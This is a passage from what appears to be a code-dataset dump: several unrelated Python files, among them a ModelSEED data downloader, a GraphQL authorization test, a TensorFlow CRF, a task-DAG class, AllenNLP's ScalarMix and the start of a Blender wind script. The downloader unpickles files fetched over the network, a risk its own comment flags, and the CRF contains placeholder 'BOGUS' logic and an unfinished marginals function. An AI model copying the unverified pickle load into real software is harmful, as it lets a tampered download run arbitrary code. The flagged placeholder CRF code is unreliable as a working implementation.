    # to (and overwrote) the same bogus file regardless of `filename`.
    file_path = f'{folder_path}/{filename}'
    if not os.path.exists(folder_path):
        logger.warning('mkdir: %s', folder_path)
        os.makedirs(folder_path)
    if not os.path.exists(file_path):
        logger.warning('downloading data file to: %s', file_path)
        url = 'https://bioseed.mcs.anl.gov/~fxliu/modelseedpy/' + filename
        r = requests.get(url, allow_redirects=True)
        with open(file_path, 'wb') as fh:
            fh.write(r.content)
    return file_path
def get_file(filename, k, value):
    """Wrapper around get_or_download_file bound to the module-level config."""
    return get_or_download_file(filename, k, value, config)
def get_classifier(classifier_id):
    """Load a genome classifier: a pickled model plus its JSON feature list.

    Both files are fetched on demand into the configured classifier folder.
    SECURITY NOTE: pickle.load executes arbitrary code from the downloaded
    file; only use this against the trusted ModelSEED mirror.
    """
    # local import — presumably avoids a circular import at module load time
    from modelseedpy.core.msgenomeclassifier import MSGenomeClassifier
    cls_pickle = get_file(f'{classifier_id}.pickle', 'data', 'classifier_folder')
    cls_features = get_file(f'{classifier_id}_features.json', 'data', 'classifier_folder')
    with open(cls_pickle, 'rb') as fh:
        model_filter = pickle.load(fh)
    with open(cls_features, 'r') as fh:
        features = json.load(fh)
    return MSGenomeClassifier(model_filter, features)
def get_template(template_id):
    """Fetch (if needed) the template file and return its parsed JSON."""
    # we need a mstemplate object!
    template_file = get_file(f'{template_id}.json', 'data', 'template_folder')
    with open(template_file, 'r') as fh:
        return json.load(fh)
|
python
|
from collections import namedtuple

# BUG FIX: the typename must match the name the class is bound to.
# With namedtuple('point', ...) assigned to `Point`, pickling fails
# (pickle looks up `point` in this module and finds nothing) and reprs
# show the wrong class name.
Point = namedtuple('Point', 'x, y')

mouse_pos = Point(100, 200)
print("X Position of Mouse:", mouse_pos.x)
|
python
|
import json
from graphql_relay import to_global_id
from tracker.api.services.auth import (
generate_auth_token,
)
from tracker.api.status_codes import StatusEnum
async def test_create_role_mutation(
    client,
    setup_project_list_test_retrun_auth_token
):
    """Role creation must be rejected (FORBIDDEN) both for a non-PM user
    and for a PM token used against a nonexistent project id.

    NOTE: the GraphQL endpoint reports errors in the response body with
    HTTP 200, hence the status==200 assertions below.
    """
    pm_auth_token = setup_project_list_test_retrun_auth_token
    app = client.server.app
    # token for user 2 — presumably not the PM of project 1; confirm fixture
    auth_token = generate_auth_token(app['config'], user_id=2)

    query = '''
        mutation RoleCreationMutation($input: RoleCreationInput!) {
            role {
                roleCreation(input: $input) {
                    roleCreationPayload {
                        duplicatedEmailList
                        status
                        errorList
                    }
                }
            }
        }
    '''
    variables = {
        'input': {
            'projectId': to_global_id('ProjectType', 1),
            'role': 'team_member',
            'emailList': ['[email protected]', '[email protected]'],
        }
    }

    # with no pm token
    response = await client.post(
        '/graphql',
        data=json.dumps({
            'query': query,
            'variables': json.dumps(variables),
        }),
        headers={
            'content-type': 'application/json',
            'Authorization': f'Bearer {auth_token}'
        },
    )
    # if something will go wrong there will be response body output
    print(await response.text())
    assert response.status == 200
    data = await response.json()
    assert data['errors'][0]['status'] == StatusEnum.FORBIDDEN._name_

    # with invalid project id
    variables = {
        'input': {
            'projectId': to_global_id('ProjectType', 99999),
            'role': 'team_member',
            'emailList': ['[email protected]', '[email protected]'],
        }
    }
    response = await client.post(
        '/graphql',
        data=json.dumps({
            'query': query,
            'variables': json.dumps(variables),
        }),
        headers={
            'content-type': 'application/json',
            'Authorization': f'Bearer {pm_auth_token}'
        },
    )
    # if something will go wrong there will be response body output
    print(await response.text())
    assert response.status == 200
    data = await response.json()
    assert data['errors'][0]['status'] == StatusEnum.FORBIDDEN._name_
|
python
|
import pandas as pd
from .taxa_tree import NCBITaxaTree
from ..constants import MICROBE_DIR
# Annotation columns pulled from the microbe-directory table when joining
# onto the per-taxon frame in annotate_taxa().
MICROBE_DIR_COLS = [
    'gram_stain',
    'microbiome_location',
    'antimicrobial_susceptibility',
    'optimal_temperature',
    'extreme_environment',
    'biofilm_forming',
    'optimal_ph',
    'animal_pathogen',
    'spore_forming',
    'pathogenicity',
    'plant_pathogen'
]
def annotate_taxa(taxa):
    """Return a pandas dataframe with annotations for the given taxa.

    The frame is indexed by taxon name, carries each taxon's phylum
    ('unknown' when unresolved), and is left-joined with the
    microbe-directory annotation columns.
    """
    tree = NCBITaxaTree.parse_files()
    phyla_per_taxon = [tree.phyla(taxon, 'unknown') for taxon in taxa]
    result = pd.DataFrame.from_dict(
        {'taxa': taxa, 'phyla': phyla_per_taxon}, orient='columns'
    ).set_index('taxa')
    directory = pd.read_csv(MICROBE_DIR).set_index('species')
    return result.join(directory[MICROBE_DIR_COLS], how='left')
|
python
|
import json
import os
from django.apps import apps
# Directory containing this file (the django-tailwind package directory).
DJANGO_TAILWIND_APP_DIR = os.path.dirname(__file__)
def get_app_path(app_name):
    """Return the filesystem path of the installed Django app *app_name*.

    Only the final dotted component is used as the app label.
    """
    label = app_name.rsplit(".", 1)[-1]
    return apps.get_app_config(label).path
def get_tailwind_src_path(app_name):
    """Return the path of the app's ``static_src`` directory."""
    return os.path.join(get_app_path(app_name), "static_src")
def get_package_json_path(app_name):
    """Return the path of the app's ``static_src/package.json`` file."""
    return os.path.join(get_app_path(app_name), "static_src", "package.json")
def get_package_json_contents(app_name):
    """Read and parse the app's ``static_src/package.json``."""
    package_json = get_package_json_path(app_name)
    with open(package_json, "r") as f:
        return json.load(f)
def is_path_absolute(path):
    """True for root-absolute paths (``/...``) and URL-ish paths (``http...``)."""
    return path.startswith(("/", "http"))
|
python
|
from model_defs import *
from utils import *
from tensorflow.models.rnn.rnn_cell import *
###################################
# Building blocks #
###################################
# takes features and outputs potentials
def potentials_layer(in_layer, mask, config, params, reuse=False, name='Potentials'):
    """Map per-token features to CRF log-potentials.

    in_layer: (batch_size, num_steps, input_size) float features.
    mask: (batch_size, num_steps) 1/0 float mask; padded positions are
    overwritten with a large potential on tag 0 (see below).
    Returns (pots_layer, W_pot, b_pot); pots_layer has shape
    (batch_size, num_steps, n_tags, ..., n_tags) with `pot_window` tag axes.
    In the current "BOGUS" code path no parameters are created, so
    W_pot and b_pot are both False.
    NOTE(review): Python 2 assumed — `config.pot_window / 2` must be an int.
    """
    batch_size = int(in_layer.get_shape()[0])
    num_steps = int(in_layer.get_shape()[1])
    input_size = int(in_layer.get_shape()[2])
    # one tag axis per position in the potential window
    pot_shape = [config.n_tags] * config.pot_window
    out_shape = [batch_size, num_steps] + pot_shape
    #~ pot_size = config.n_tags ** config.pot_window
    #~ if reuse:
    #~ tf.get_variable_scope().reuse_variables()
    #~ W_pot = params.W_pot
    #~ b_pot = params.b_pot
    #~ else:
    #~ W_pot = weight_variable([input_size, pot_size], name=name)
    #~ b_pot = bias_variable([pot_size], name=name)
    #~ flat_input = tf.reshape(in_layer, [-1, input_size])
    #~ pre_scores = tf.matmul(flat_input, W_pot) + b_pot
    # BOGUS: sums feature slices across the window instead of a learned
    # projection (the commented-out code above is the intended version)
    W_pot = False
    b_pot = False
    reshaped_in = tf.reshape(in_layer, [batch_size, num_steps, config.pot_window, -1])
    pre_scores = tf.reduce_sum(reshaped_in, 2)
    # /BOGUS
    pots_layer = tf.reshape(pre_scores, out_shape)
    # define potentials for padding tokens: +10000 on tag 0 of the center
    # position of the window, so decoding keeps padding at tag 0
    padding_pot = np.zeros(pot_shape)
    num = config.pot_window / 2
    idx = [slice(None)] * num + [0] + [slice(None)] * num
    padding_pot[idx] += 10000
    pad_pot = tf.convert_to_tensor(padding_pot, tf.float32)
    pad_pots = tf.expand_dims(tf.expand_dims(pad_pot, 0), 0)
    pad_pots = tf.tile(pad_pots, [batch_size, num_steps] + [1] * config.pot_window)
    # expand the 2-D mask to the full potential shape
    mask_a = mask
    for _ in range(config.pot_window):
        mask_a = tf.expand_dims(mask_a, -1)
    mask_a = tf.tile(mask_a, [1, 1] + pot_shape)
    # combine: real tokens keep their potentials, padding gets pad_pots
    pots_layer = (pots_layer * mask_a + (1 - mask_a) * pad_pots)
    return (pots_layer, W_pot, b_pot)
# pseudo-likelihood criterion
def pseudo_likelihood(potentials, pot_indices, targets, config):
    """Pseudo-log-likelihood: sum over tokens of log p(tag_i | neighbours).

    Returns (conditional, p_ll) where conditional has shape
    (batch_size, num_steps, n_tags) and p_ll is a scalar.
    NOTE(review): Python 2 semantics required — `range` must return a list
    (perm is mutated below) and `pot_window / 2` must be an int.
    """
    batch_size = int(potentials.get_shape()[0])
    num_steps = int(potentials.get_shape()[1])
    pots_shape = map(int, potentials.get_shape()[2:])  # unused here
    # move the current tag to the last dimension
    perm = range(len(potentials.get_shape()))
    mid = config.pot_window / 2
    perm[-1] = perm[-mid - 1]
    for i in range(-1, mid -1):
        perm[-mid + i] = perm[-mid + i] + 1
    perm_potentials = tf.transpose(potentials, perm=perm)
    # get conditional distribution of the current tag:
    # pot_indices selects, per token, the row matching its neighbour tags
    flat_pots = tf.reshape(perm_potentials, [-1, config.n_tags])
    flat_cond = tf.gather(flat_pots, pot_indices)
    pre_cond = tf.nn.softmax(flat_cond)
    conditional = tf.reshape(pre_cond, [batch_size, num_steps, -1])
    # compute pseudo-log-likelihood of sequence (one-hot targets pick the
    # log-probability of the gold tag at each position)
    p_ll = tf.reduce_sum(targets * tf.log(conditional))
    return (conditional, p_ll)
# dynamic programming part 1: max sum
class CRFMaxCell(RNNCell):
    """Dynamic programming for CRF: one max-sum (Viterbi) step per call.

    The state holds, for each (pot_window - 1)-tag history, the best score
    reaching it so far.
    """
    def __init__(self, config):
        # number of tag histories tracked in the state
        self._num_units = config.n_tags ** (config.pot_window - 1)
        self.n_tags = config.n_tags
    @property
    def input_size(self):
        return self._num_units
    @property
    def output_size(self):
        return self._num_units
    @property
    def state_size(self):
        return self._num_units
    def __call__(self, inputs, state, scope=None):
        """Summation for dynamic programming. Inputs are the
        log-potentials. States are the results of the summation at the
        last step. Returns (new_state, max_id) — the running maxima and
        the argmax back-pointers used for decoding."""
        with tf.variable_scope(scope or type(self).__name__):
            # add states and log-potentials: broadcast the previous scores
            # across the new tag axis first
            multiples = [1] * (len(state.get_shape()) + 1)
            multiples[-1] = self.n_tags
            exp_state = tf.tile(tf.expand_dims(state, -1), multiples)
            added = exp_state + inputs
            # return maxes, arg_maxes along first dimension (after the batch dim)
            new_state = tf.reduce_max(added, 1)
            max_id = tf.argmax(added, 1)
            return new_state, max_id
# max a posteriori tags assignment: implement dynamic programming
def map_assignment(potentials, config):
    """MAP (Viterbi-style) decoding: forward max-sum, then backtracking.

    potentials: (batch_size, num_steps, n_tags, ..., n_tags).
    Returns an integer tensor (batch_size, num_steps) of decoded tags.
    NOTE(review): Python 2 semantics assumed — `map` must return a list and
    `/` must be integer division (also on the int64 tensors below).
    """
    batch_size = int(potentials.get_shape()[0])
    num_steps = int(potentials.get_shape()[1])
    pots_shape = map(int, potentials.get_shape()[2:])
    # one potentials tensor per time step
    inputs_list = [tf.reshape(x, [batch_size] + pots_shape)
                   for x in tf.split(1, num_steps, potentials)]
    # forward pass
    max_cell = CRFMaxCell(config)
    max_ids = [0] * len(inputs_list)
    # initial state: starts at 0 - 0 - 0 etc...
    state = tf.zeros(pots_shape[:-1])
    for t, input_ in enumerate(inputs_list):
        state, max_id = max_cell(inputs_list[t], state)
        max_ids[t] = max_id
    # backward pass: per-example offsets into the flattened back-pointer tables
    powers = tf.to_int64(map(float, range(batch_size))) * \
        (config.n_tags ** (config.pot_window - 1))
    outputs = [-1] * len(inputs_list)
    best_end = tf.argmax(tf.reshape(state, [batch_size, -1]), 1)
    current = best_end
    mid = config.pot_window / 2
    max_pow = (config.n_tags ** mid)
    for i, _ in enumerate(outputs):
        # the leading base-n_tags digit of `current` is the decoded tag
        outputs[-1 - i] = (current / max_pow)
        prev_best = tf.gather(tf.reshape(max_ids[-1 - i], [-1]), current + powers)
        current = prev_best * max_pow + (current / config.n_tags)
    map_tags = tf.transpose(tf.pack(outputs))
    return map_tags
# dynamic programming part 2: sum product
class CRFSumCell(RNNCell):
    """Dynamic programming for CRF: one sum-product step per call.

    The state holds, for each (pot_window - 1)-tag history, the running
    log-sum of scores reaching it.
    """
    def __init__(self, config):
        # number of tag histories tracked in the state
        self._num_units = config.n_tags ** (config.pot_window - 1)
        self.n_tags = config.n_tags
    @property
    def input_size(self):
        return self._num_units
    @property
    def output_size(self):
        return self._num_units
    @property
    def state_size(self):
        return self._num_units
    def __call__(self, inputs, state, scope=None):
        """Summation for dynamic programming. Inputs are the
        log-potentials. States are the results of the summation at the
        last step. Returns the new log-sum state."""
        with tf.variable_scope(scope or type(self).__name__):
            # add states and log-potentials: broadcast the previous sums
            # across the new tag axis first
            multiples = [1] * (len(state.get_shape()) + 1)
            multiples[-1] = self.n_tags
            exp_state = tf.tile(tf.expand_dims(state, -1), multiples)
            added = exp_state + inputs
            # log-sum along first dimension (after the batch dim), computed
            # as log-sum-exp with the global max subtracted for stability
            max_val = tf.reduce_max(added)
            added_exp = tf.exp(added - max_val)
            summed_exp = tf.reduce_sum(added_exp, 1)
            new_state = tf.log(summed_exp) + max_val
            return new_state
# computing the log partition for a sequence of length config.num_steps
def log_partition(potentials, config):
    """Log-partition log Z via the forward (sum-product) recursion,
    summed over the batch.
    NOTE(review): Python 2 semantics assumed (`map` returning a list).
    """
    batch_size = int(potentials.get_shape()[0])
    num_steps = int(potentials.get_shape()[1])
    pots_shape = map(int, potentials.get_shape()[2:])
    # one potentials tensor per time step
    inputs_list = [tf.reshape(x, [batch_size] + pots_shape)
                   for x in tf.split(1, num_steps, potentials)]
    # forward pass
    sum_cell = CRFSumCell(config)
    state = tf.zeros([batch_size] + pots_shape[:-1])
    partial_sums = [0] * len(inputs_list)  # kept, but only the final state is used
    for t, input_ in enumerate(inputs_list):
        state = sum_cell(inputs_list[t], state)
        partial_sums[t] = state
    # sum at the end: final log-sum-exp, max subtracted for stability
    max_val = tf.reduce_max(state)
    state_exp = tf.exp(state - max_val)
    log_part = tf.log(tf.reduce_sum(tf.reshape(state_exp, [batch_size, -1]), 1)) + max_val
    return tf.reduce_sum(log_part)
# compute the log to get the log-likelihood
def log_score(potentials, window_indices, mask, config):
    """Unnormalized log-score of the gold tag windows.

    window_indices addresses the fully flattened potentials tensor; padded
    tokens are zeroed out via `mask` before the final sum.
    """
    batch_size = int(potentials.get_shape()[0])
    num_steps = int(potentials.get_shape()[1])
    pots_shape = map(int, potentials.get_shape()[2:])  # unused here
    flat_pots = tf.reshape(potentials, [-1])
    flat_scores = tf.gather(flat_pots, window_indices)
    scores = tf.reshape(flat_scores, [batch_size, num_steps])
    # tf.mul is the pre-1.0 TensorFlow name for element-wise multiply
    scores = tf.mul(scores, mask)
    return tf.reduce_sum(scores)
# TODO: alpha-beta rec
# TODO: alpha-beta rec
def marginals(potentials, config):
    """Forward-backward recursion for marginals — UNFINISHED: always
    returns 0; only the partial sums are computed.
    NOTE(review): state_b consumes the inputs in forward order; a true
    backward pass presumably needs them reversed — confirm before use.
    """
    batch_size = int(potentials.get_shape()[0])
    num_steps = int(potentials.get_shape()[1])
    pots_shape = map(int, potentials.get_shape()[2:])
    inputs_list = [tf.reshape(x, [batch_size] + pots_shape)
                   for x in tf.split(1, num_steps, potentials)]
    # forward and backward pass
    sum_cell_f = CRFSumCell(config)
    sum_cell_b = CRFSumCell(config)
    state_f = tf.convert_to_tensor(np.zeros(pots_shape[:-1]))
    state_b = tf.convert_to_tensor(np.zeros(pots_shape[:-1]))
    partial_sums_f = [0] * len(inputs_list)
    partial_sums_b = [0] * len(inputs_list)
    for t, _ in enumerate(inputs_list):
        state_f = sum_cell_f(inputs_list[t], state_f)
        partial_sums_f[t] = state_f
        state_b = sum_cell_b(inputs_list[t], state_b)
        partial_sums_b[-1 - t] = state_b
    # TODO: compute marginals
    marginals = 0
    return marginals
###################################
# Making a (deep) CRF #
###################################
class CRF:
    """Linear-chain CRF over a learned feature layer.

    __init__ only creates the input placeholders; make() wires the
    potentials, the (pseudo-)likelihood criteria, the regularizers and
    the MAP decoder into the graph.
    """
    def __init__(self, config):
        self.batch_size = config.batch_size
        self.num_steps = config.num_steps
        num_features = len(config.input_features)
        # input_ids <- batch.features
        self.input_ids = tf.placeholder(tf.int32, shape=[self.batch_size,
                                                         self.num_steps,
                                                         num_features])
        # mask <- batch.mask (1.0 on real tokens, 0.0 on padding)
        self.mask = tf.placeholder(tf.float32, [self.batch_size, self.num_steps])
        # pot_indices <- batch.tag_neighbours_lin
        self.pot_indices = tf.placeholder(tf.int32,
                                          [config.batch_size * config.num_steps])
        # targets <- batch.tags_one_hot
        self.targets = tf.placeholder(tf.float32, [config.batch_size,
                                                   config.num_steps,
                                                   config.n_tags])
        # window_indices <- batch.tag_windows_lin
        self.window_indices = tf.placeholder(tf.int32,
                                             [config.batch_size * config.num_steps])

    def make(self, config, params, reuse=False, name='CRF'):
        """Build the graph: features -> potentials -> criteria / accuracies."""
        # TODO: add marginal inference
        with tf.variable_scope(name):
            if reuse:
                tf.get_variable_scope().reuse_variables()
            # out_layer <- output of NN (TODO: add layers)
            (out_layer, embeddings) = feature_layer(self.input_ids,
                                                    config, params,
                                                    reuse=reuse)
            params.embeddings = embeddings
            if config.verbose:
                print('features layer done')
            self.out_layer = out_layer
            # pots_layer <- potentials
            (pots_layer, W_pot, b_pot) = potentials_layer(out_layer,
                                                          self.mask,
                                                          config, params,
                                                          reuse=reuse)
            params.W_pot = W_pot
            params.b_pot = b_pot
            if config.verbose:
                print('potentials layer done')
            self.pots_layer = pots_layer
            # pseudo-log-likelihood
            conditional, pseudo_ll = pseudo_likelihood(pots_layer,
                                                       self.pot_indices,
                                                       self.targets, config)
            self.pseudo_ll = pseudo_ll
            # accuracy of p(t_i | t_{i-1}, t_{i+1})
            correct_cond_pred = tf.equal(tf.argmax(conditional, 2), tf.argmax(self.targets, 2))
            correct_cond_pred = tf.cast(correct_cond_pred, "float")
            cond_accuracy = tf.reduce_sum(correct_cond_pred * tf.reduce_sum(self.targets, 2)) /\
                tf.reduce_sum(self.targets)
            self.cond_accuracy = cond_accuracy
            # log-likelihood = gold score - log partition
            log_sc = log_score(self.pots_layer, self.window_indices,
                               self.mask, config)
            log_part = log_partition(self.pots_layer, config)
            log_likelihood = log_sc - log_part
            self.log_likelihood = log_likelihood
            # L1 regularization (the l1_reg coefficient is baked in here)
            self.l1_norm = tf.reduce_sum(tf.zeros([1]))
            for feat in config.l1_list:
                self.l1_norm += config.l1_reg * \
                    tf.reduce_sum(tf.abs(params.embeddings[feat]))
            # L2 regularization (the l2_reg coefficient is baked in here)
            self.l2_norm = tf.reduce_sum(tf.zeros([1]))
            for feat in config.l2_list:
                self.l2_norm += config.l2_reg * \
                    tf.reduce_sum(tf.mul(params.embeddings[feat],
                                         params.embeddings[feat]))
            # map assignment and accuracy of map assignment
            map_tags = map_assignment(self.pots_layer, config)
            correct_pred = tf.equal(map_tags, tf.argmax(self.targets, 2))
            correct_pred = tf.cast(correct_pred, "float")
            accuracy = tf.reduce_sum(correct_pred * tf.reduce_sum(self.targets, 2)) /\
                tf.reduce_sum(self.targets)
            self.map_tags = map_tags
            self.accuracy = accuracy

    def train_epoch(self, data, config, params, session, crit_type='likelihood'):
        """Run one training epoch; returns the average criterion per batch."""
        batch_size = config.batch_size
        if crit_type == 'pseudo':
            criterion = -self.pseudo_ll
        else:
            criterion = -self.log_likelihood
        # BUG FIX: the regularization penalties must be *added* to the
        # minimized criterion (subtracting them rewarded large weights), and
        # l1_norm / l2_norm already carry their reg coefficients (see make()),
        # so they must not be scaled by l1_reg again here.
        criterion += self.l1_norm + self.l2_norm
        train_step = tf.train.AdagradOptimizer(config.learning_rate).minimize(criterion)
        session.run(tf.initialize_all_variables())
        # TODO: gradient clipping
        total_crit = 0.
        # floor division keeps this an int under Python 3 as well
        n_batches = len(data) // batch_size
        batch = Batch()
        for i in range(n_batches):
            batch.read(data, i * batch_size, config)
            f_dict = {self.input_ids: batch.features,
                      self.pot_indices: batch.tag_neighbours_lin,
                      self.window_indices: batch.tag_windows_lin,
                      self.mask: batch.mask,
                      self.targets: batch.tags_one_hot}
            train_step.run(feed_dict=f_dict)
            crit = criterion.eval(feed_dict=f_dict)
            total_crit += crit
            if i % 50 == 0:
                # (a duplicate bare Python-2 print of the same values was dropped)
                train_accuracy = self.accuracy.eval(feed_dict=f_dict)
                print("step %d of %d, training accuracy %f, criterion %f" %
                      (i, n_batches, train_accuracy, crit))
        print("total crit %s" % (total_crit / n_batches))
        return total_crit / n_batches

    def validate_accuracy(self, data, config):
        """Evaluate MAP / conditional accuracy and both likelihoods over
        `data`; returns (map_accuracy, cond_accuracy)."""
        batch_size = config.batch_size
        batch = Batch()
        total_accuracy = 0.
        total_cond_accuracy = 0.
        # BUG FIX: these accumulators were used below without ever being
        # initialized, which raised NameError on the first batch.
        total_pll = 0.
        total_ll = 0.
        total = 0.
        for i in range(len(data) // batch_size):
            batch.read(data, i * batch_size, config)
            # BUG FIX: mask and window_indices were missing from the feed,
            # but accuracy / log_likelihood depend on those placeholders
            # (via potentials_layer and log_score), so every eval failed.
            f_dict = {self.input_ids: batch.features,
                      self.targets: batch.tags_one_hot,
                      self.pot_indices: batch.tag_neighbours_lin,
                      self.window_indices: batch.tag_windows_lin,
                      self.mask: batch.mask}
            dev_accuracy = self.accuracy.eval(feed_dict=f_dict)
            dev_cond_accuracy = self.cond_accuracy.eval(feed_dict=f_dict)
            pll = self.pseudo_ll.eval(feed_dict=f_dict)
            ll = self.log_likelihood.eval(feed_dict=f_dict)
            total_accuracy += dev_accuracy
            total_cond_accuracy += dev_cond_accuracy
            total_pll += pll
            total_ll += ll
            total += 1
            if i % 100 == 0:
                # BUG FIX: the format string has six placeholders but only
                # four values were supplied, raising TypeError here.
                print("%d of %d: \t map accuracy: %f \t cond accuracy: %f \
                      \t pseudo_ll: %f \t log_likelihood: %f" % (i, len(data) // batch_size,
                                                                 total_accuracy / total,
                                                                 total_cond_accuracy / total,
                                                                 total_pll / total,
                                                                 total_ll / total))
        return (total_accuracy / total, total_cond_accuracy / total)
|
python
|
import networkx as nx
import numpy as np
import torch
from gym_ds3.envs.core.node import Node
from gym_ds3.envs.utils.helper_dict import OrderedSet
class JobDAG(object):
    """DAG view of a job: adjacency matrix, Node wrappers and scheduling
    bookkeeping (arrival / completion timestamps, frontier set)."""

    def __init__(self, job):
        self.job = job
        self.jobID = self.job.task_list[0].jobID
        self.commvol = self.job.comm_vol  # inter-task communication volumes
        self.tasks = self.job.task_list
        self.adj_mat = self.get_adj_mat(self.tasks)
        self.arrived = False  # dag is arrived
        self.is_completed = False
        self.is_running = False
        self.start_exec_time = np.inf  # dag start time
        self.start_inject_time = np.inf  # dag inject time
        self.completion_time = np.inf  # dag finish time
        # Dependency graph (num_tasks, num_tasks)
        self.predecessor = self.predecessors(self.tasks)
        # The features of Node : jobID, taskID, status, deadline, start time, finish time, est
        self.nodes = self.get_nodes(self.tasks, self.adj_mat)
        self.num_nodes = len(self.job.task_list)
        # Nodes whose dependencies are already satisfied, i.e. schedulable now.
        self.frontier_nodes = OrderedSet()
        for node in self.nodes:
            if node.is_schedulable():
                self.frontier_nodes.add(node)

    def get_adj_mat(self, tasks):
        """Build a dense 0/1 adjacency matrix (num_tasks x num_tasks) from the
        communication-volume graph; mat[i][j] == 1 means edge i -> j exists."""
        adj = nx.DiGraph(self.commvol)
        adj.remove_edges_from(
            # Remove all edges with weight of 0 since we have no placeholder for "this edge doesn't exist"
            # NOTE(review): weights are compared against the *string* '0.0' --
            # the comm_vol data apparently stores them as strings; confirm.
            [edge for edge in adj.edges() if adj.get_edge_data(*edge)['weight'] == '0.0']
        )
        # Identity relabel performed in place (normalizes the node keys).
        nx.relabel_nodes(adj, lambda idx: idx, copy=False)
        adj = from_networkx(adj)  # module-level helper defined below
        mat = np.zeros((len(tasks), len(tasks)))
        index_list = adj['edge_index'].transpose(0, 1)  # .T does not work with pytorch > v1.1
        for i in range(len(index_list)):
            mat[index_list[i][0]][index_list[i][1]] = 1
        return mat

    def get_nodes(self, tasks, adj_mat):
        """Wrap each task in a Node and wire parent/child links from adj_mat."""
        nodes = [Node(task) for task in tasks]
        for i in range(len(tasks)):
            for j in range(len(tasks)):
                if adj_mat[i, j] == 1:
                    nodes[i].child_nodes.append(nodes[j])
                    nodes[j].parent_nodes.append(nodes[i])
        return nodes

    def predecessors(self, tasks):
        """Binary dependency matrix: dependency[i][p] = 1 when task i depends on
        predecessor id p (taken modulo the task count)."""
        dependency = np.zeros((len(tasks), len(tasks)))
        for idx, node in enumerate(tasks):
            for predecessorNode in node.predecessors:
                dependency[idx][predecessorNode % len(tasks)] = 1.
        return dependency
# Modified from https://github.com/rusty1s/pytorch_geometric/blob/e6b8d6427ad930c6117298006d7eebea0a37ceac/torch_geometric/utils/convert.py#L108
def from_networkx(G):
    r"""Converts a :obj:`networkx.Graph` or :obj:`networkx.DiGraph` to a
    :class:`torch_geometric.data.Data` instance.

    Args:
        G (networkx.Graph or networkx.DiGraph): A networkx graph.

    Note: unlike upstream, this modified copy returns a plain ``dict``
    rather than a ``Data`` object.
    """
    G = nx.convert_node_labels_to_integers(G)
    G = G.to_directed() if not nx.is_directed(G) else G
    # (2, num_edges) edge index in COO format.
    edge_index = torch.LongTensor(list(G.edges)).t().contiguous()
    data = {}
    # Collect node attributes, one list entry per node, in node order.
    # NOTE: assumes every node carries the same attribute keys; a key that
    # first appears on a later node would raise KeyError here.
    for i, (_, feat_dict) in enumerate(G.nodes(data=True)):
        for key, value in feat_dict.items():
            data[str(key)] = [value] if i == 0 else data[str(key)] + [value]
    # Same for edge attributes, in edge order.
    for i, (_, _, feat_dict) in enumerate(G.edges(data=True)):
        for key, value in feat_dict.items():
            data[str(key)] = [value] if i == 0 else data[str(key)] + [value]
    for key, item in data.items():
        try:
            data[key] = torch.tensor(item)
        except ValueError:
            # Non-numeric / ragged attributes stay as plain lists.
            pass
    data['edge_index'] = edge_index.view(2, -1)
    data['num_nodes'] = G.number_of_nodes()
    return data
|
python
|
from typing import List
import torch
from torch.nn import ParameterList, Parameter
from allennlp.common.checks import ConfigurationError
class ScalarMix(torch.nn.Module):
    """
    Computes a parameterised scalar mixture of N tensors,
    `mixture = gamma * sum(s_k * tensor_k)` where `s = softmax(w)`, with `w`
    and `gamma` scalar parameters.

    If `do_layer_norm=True`, each tensor is additionally layer-normalized
    (under the mask) before being weighted.
    """

    def __init__(
        self,
        mixture_size: int,
        do_layer_norm: bool = False,
        initial_scalar_parameters: List[float] = None,
        trainable: bool = True,
    ) -> None:
        super().__init__()
        self.mixture_size = mixture_size
        self.do_layer_norm = do_layer_norm

        if initial_scalar_parameters is None:
            initial_scalar_parameters = [0.0] * mixture_size
        elif len(initial_scalar_parameters) != mixture_size:
            raise ConfigurationError(
                "Length of initial_scalar_parameters {} differs "
                "from mixture_size {}".format(initial_scalar_parameters, mixture_size)
            )

        # One scalar weight per input tensor, plus a single global gamma.
        scalars = []
        for value in initial_scalar_parameters:
            scalars.append(Parameter(torch.FloatTensor([value]), requires_grad=trainable))
        self.scalar_parameters = ParameterList(scalars)
        self.gamma = Parameter(torch.FloatTensor([1.0]), requires_grad=trainable)

    def forward(self, tensors: List[torch.Tensor], mask: torch.BoolTensor = None) -> torch.Tensor:
        """
        Compute a weighted average of the `tensors`. The input tensors can be
        any shape with at least two dimensions, but must all be the same shape.

        When `do_layer_norm=True`, the `mask` is required input. If the
        `tensors` are dimensioned `(dim_0, ..., dim_{n-1}, dim_n)`, then the
        `mask` is dimensioned `(dim_0, ..., dim_{n-1})`, as in the typical
        case with `tensors` of shape `(batch_size, timesteps, dim)` and `mask`
        of shape `(batch_size, timesteps)`.

        When `do_layer_norm=False` the `mask` is ignored.
        """
        if len(tensors) != self.mixture_size:
            raise ConfigurationError(
                "{} tensors were passed, but the module was initialized to "
                "mix {} tensors.".format(len(tensors), self.mixture_size)
            )

        def _masked_layer_norm(tensor, broadcast_mask, num_unmasked):
            # Mean/variance over the unmasked positions only.
            masked = tensor * broadcast_mask
            mean = torch.sum(masked) / num_unmasked
            centered = (masked - mean) * broadcast_mask
            variance = torch.sum(centered ** 2) / num_unmasked
            return (tensor - mean) / torch.sqrt(variance + 1e-12)

        # Softmax over the learned scalars gives the mixing weights.
        weights = torch.nn.functional.softmax(
            torch.cat(list(self.scalar_parameters)), dim=0
        )
        weights = torch.split(weights, split_size_or_sections=1)

        if self.do_layer_norm:
            broadcast_mask = mask.unsqueeze(-1)
            num_unmasked = torch.sum(mask) * tensors[0].size(-1)
            mixed = sum(
                weight * _masked_layer_norm(tensor, broadcast_mask, num_unmasked)
                for weight, tensor in zip(weights, tensors)
            )
        else:
            mixed = sum(weight * tensor for weight, tensor in zip(weights, tensors))
        return self.gamma * mixed
|
python
|
import bpy,bmesh
import time,copy,mathutils,math
from mathutils import noise
# Global mutable state shared between the frame-change handler and the
# modal timer operator.
Context = {
    "lasttick": 0,      # wall-clock time of the last frame-change tick
    "running": False,   # True while the wind displacement is active
    "store": {},        # per-object backup of original vertex coordinates
    "starttime": -1     # wall-clock time of the first tick (-1 = unset)
}
def timeNow():
    """Return the current wall-clock time in seconds."""
    return time.time()
def calcFrameTime():
    """Return the duration of one scene frame in seconds (clamped to 1 fps max)."""
    scene_fps = float(bpy.context.scene.render.fps)
    return 1.0 / max(1.0, scene_fps)
def wind(v, co, col, noiseAmmount, timeN):
    """Return a displaced copy of vertex rest position `co` simulating wind.

    Parameters
    ----------
    v: the vertex itself (unused; kept for interface compatibility)
    co: (x, y, z) rest position of the vertex
    col: optional per-vertex color used as a weight; index 3 scales the
        overall effect, indices 0-2 gate the individual sine components.
        None means full weight (1, 1, 1, 1).
    noiseAmmount: (x, y, z) global wind strength per axis
    timeN: animation time in seconds
    """
    pos = list(co)
